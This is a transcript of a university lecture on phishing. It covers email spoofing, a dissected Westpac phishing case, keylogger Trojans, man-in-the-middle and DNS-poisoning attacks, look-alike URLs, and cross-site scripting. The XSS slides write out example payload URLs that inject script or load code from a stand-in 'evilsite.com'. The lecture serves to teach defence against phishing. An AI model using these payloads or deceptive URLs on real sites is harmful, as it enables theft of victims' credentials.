L1 phishing: Presentation Transcript

    • Phishing
        • Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh
    • About me
        • Currently, Lecturer in this department for 351 days
        • Former Research Intern in M3C Laboratory, University of Bolton, UK
    • For you
        • Email me at rushdecoder@yahoo.com if you want
        • My homepage and course materials are at http://rushdishams.googlepages.com
        • You need to join http://groups.google.com/group/csebatchesofrushdi
    • Phishing
        • The number of unique e-mail-based fraud attacks detected in November 2005 was 16,882, almost double the 8,975 attacks launched in November 2004, said the report (Anti-Phishing Working Group)
        • Phishing e-mails pretend to come from legitimate companies, such as banks and e-commerce sites
        • Used by criminals to try and trick Web users into revealing personal information and account details
    • Phishing
        • The number of brands targeted increased by nearly 50 percent over the course of 2005, from 64 percent to 93 percent in November 2006
        • "One big attack will temporarily hurt a brand, but the increase in e-commerce is not slowing down," (Mark Murtagh, Websense technical director)
    • Phishing
        • Top brands continue to be hijacked, with phishers using established names to try to lure people to their sites
        • eBay is often spoofed, for obvious reasons
        • Google is increasingly being targeted because of its expansion into different business application models
        • The big banking names are used too: HSBC, Citigroup, Lloyds, all the major brands
    • Phishing
        • There's no point in using local names if the attack is global
        • Attacks are becoming increasingly sophisticated
        • Web sites are hosting keylogging malicious software
        • Before, people had to click on a site to download malicious code. If they thought a web site 'phishy', they could leave and probably not be harmed. Now, with most phishing sites they just have to
    • Phishing
        • Twenty-five percent of those sites now host keylogging code
        • If you visit one you will probably open yourself to identity theft or fraud
    • Exploiting the Weakness
        • Why is it that crooks are able to mount an attack? What are the weaknesses that they exploit?
        • Richness of functionality: complex systems can have program bugs
        • Increasing interconnectivity: separate functions of any system are combined and interconnected via the Internet
    • Exploiting the Weakness
        • Expanding market in exploits: very little expertise is required, as the technical gadgets are impressive and cheap
        • The scale of content-based attacks: everyone uses e-mail and e-mail is exploitable. Then why not?
    • Social Engineering Factors
        • Phishing attacks rely upon a mix of technical deceit and social engineering practices
        • In the majority of cases the Phisher must persuade the victim
        • The victim intentionally performs a series of actions that will provide access to confidential information
    • Social Engineering Factors
        • Communication channels such as email, web pages, IRC and instant messaging services are popular
        • The Phisher must impersonate a trusted source (e.g. the helpdesk of their bank, an automated support response from their favourite online retailer, etc.) for the victim to believe
    • Social Engineering Factors
    • Phishing Techniques
        • Phishing attacks initiated by email are the most common
        • Using Trojan networks, Phishers can deliver specially crafted emails to millions of legitimate “live” email addresses within a few hours
        • Sometimes phishers purchase e-mail addresses
    • Phishing Techniques
        • Utilising well known flaws in the common mail server communication protocol (SMTP), Phishers are able to create emails with fake “Mail From:” headers and impersonate any organisation they choose
        • Any customer replies to the phishing email will be sent to them
    • Phishing Techniques
        • Official looking and sounding emails
        • Copies of legitimate corporate emails with minor URL changes
        • HTML-based email used to obfuscate target URL information
        • Standard virus/worm attachments to emails
    • Phishing Techniques
        • A plethora of anti-spam-detection inclusions
        • Crafting of “personalised” or unique email messages
        • Fake postings to popular message boards and mailing lists
        • Use of fake “Mail From:” addresses and open mail relays for disguising the source of the email
    • A real-life phishing example
    • Things to note
        • The email was sent in HTML format
        • Lower-case L’s have been replaced with upper-case I’s. This is used to help bypass many standard anti-spam filters
    • Things to note
        • Within the HTML-based email, the URL link https://oIb.westpac.com.au/ib/defauIt.asp in fact points to an escape-encoded version of the following URL: http://olb.westpac.com.au.userdll.com:4903/ib/index.htm
    • Things to note
    • Things to note
        • The non-standard HTTP port of 4903 can be attributed to the fact that the Phisher’s fake site was hosted on a third-party PC that had been previously compromised by an attacker
    • Things to note
        • Recipients that clicked on the link were then forwarded to the real Westpac application
        • However, a JavaScript popup window containing a fake login page was presented
    • Things to note
        • This fake login window was designed to capture and store the recipient’s authentication credentials
        • JavaScript also submitted the authentication information to the real Westpac application
    • Where are they standing now?  The inclusion of HTML disguised links  The use of third-party supplied, or fake, banner advertising graphics to lure customers  The use of web-bugs (hidden items within the page – such as a zero-sized graphic) to track a potential customer  The use of pop-up or frameless windows to disguise the true source of the Phishers message. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 25
    • Where are they standing now?  Embedding malicious content within the viewable web-page  installs software of the Phishers choice (e.g. key-loggers, screen-grabbers, back-doors and other Trojan horse programs). Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 26
    • Banner Advertising Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 27
    • IRC and IM  New on the Phishers radar, IRC and Instant Messaging (IM) forums are likely to become a popular phishing ground.  The common usage of Bots (automated programs that listen and participate in group discussions) in many of the popular channels, Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 28
    • Trojan Hosts  the delivery source is increasingly becoming home PC’s that have been previously compromised.  Trojan horse program has been installed which allows Phishers (along with Spammers, Warez Pirates, DDoS Bots, etc.) to use the PC as a message propagator.  tracking back a Phishing attack to an individual initiating criminal is extremely difficult. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 29
    • Trojan Hosts  the installation of Trojan horse software is on the increase, despite the efforts of large anti-virus companies.  operate large networks of Trojan deployments (networks consisting of thousands of hosts are not uncommon)  Phishers must be selective about the information they wish to record or be faced with information overload. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 30
    • Information Specific Trojans  You have come across a file named JavaUtil.zip.  But you forgot that you have “do not show known file extensions” in your Windows setting.  Hmm, then JavaUtil.zip originally maybe a .exe file whose full name is JavaUtil.zip.exe  You, unfortunately, click that zip file to unzip it.  You are doomed!  Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 31
    • Information Specific Trojans  Early in 2004, a Phisher created a custom key-logger Trojan.  The Trojan key-logger was designed specifically to capture all key presses within windows with the titles of various names including:- commbank, Commonwealth, NetBank, Citibank, Bank of America, e-gold, e-bullion, e-Bullion, evocash, EVOCash, EVOcash, intgold, INTGold, paypal, PayPal, bankwest, Bank West, BankWest, National Internet Banking, cibc, CIBC, scotiabank and ScotiaBank Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 32
    • Phishing Attack Vectors  Man-in-the-middle Attacks  URL Obfuscation Attacks  Cross-site Scripting Attacks  Preset Session Attacks Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 33
    • Man in the Middle Attacks  the attacker situates themselves between the customer and the real web-based application, and proxies all communications between the systems.  This form of attack is successful for both HTTP and HTTPS communications.  The customer connects to the attackers server as if it was the real site  The attackers server makes a simultaneous connection to the real site. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 34
    • Man in the Middle Attacks  The attackers server then proxies all communications between the customer and the real web-based application server  In the case of secure HTTPS communications, an SSL connection is established between the customer and the attackers proxy  while the attackers proxy creates its own SSL connection between itself and the real server. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 35
    • Man in the Middle Attacks Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 36
    • Man in the Middle Attacks  The attacker must be able to direct the customer to their proxy server instead of the real server.  This may be carried out through a number of methods:  Transparent Proxies  DNS Cache Poisoning  URL Obfuscation Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 37
    • Transparent Proxies  Situated on the same network segment or located on route to the real server  a transparent proxy service can intercept all data by forcing all outbound HTTP and HTTPS traffic through itself. Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 38
    • DNS Cache Poisoning  be used to disrupt normal traffic routing by injecting false IP addresses for key domain names.  the attacker poisons the DNS cache of a network firewall so that all traffic destined for the MyBank IP address now resolves to the attackers proxy server IP address Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 39
    • URL Obfuscation  the attacker tricks the customer into connecting to their proxy server instead of the real server.  the customer may follow a link to http://privatebanking.mybank.com.ch http://mybank.privatebanking.com http://privatebanking.mybonk.com http://privatebanking.mybánk.com http://privatebanking.mybank.hackproof.com  And the real one is http://privatebanking.mybank.com Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 40
    • Third party shortened URL
    • Cross Site Scripting (XSS)
        • XSS attacks make use of custom URL or code injection into a valid web-based application URL
        • They are the result of poor web-application development processes
    • Cross Site Scripting (XSS)
        • Full HTML substitution, such as: http://mybank.com/ebanking?URL=http://evilsite.com/phishing/fakepage.htm
        • Inline embedding of scripting content, such as: http://mybank.com/ebanking?page=1&client=<SCRIPT>evilcode
        • Forcing the page to load external scripting code, such as: http://mybank.com/ebanking?page=1&response=evilsite.com%21evilcode.js&go=2
    • Cross Site Scripting (XSS)
    • Preset Session Attack
    • Hidden Frame
    • Graphical Substitution
    • References
        • The Phishing Guide by Next Generation Security Software Limited
    • Related Papers
        • Technical Trends in Phishing Attacks by Jason Milletary
        • Why Phishing Works by Dhamija et al.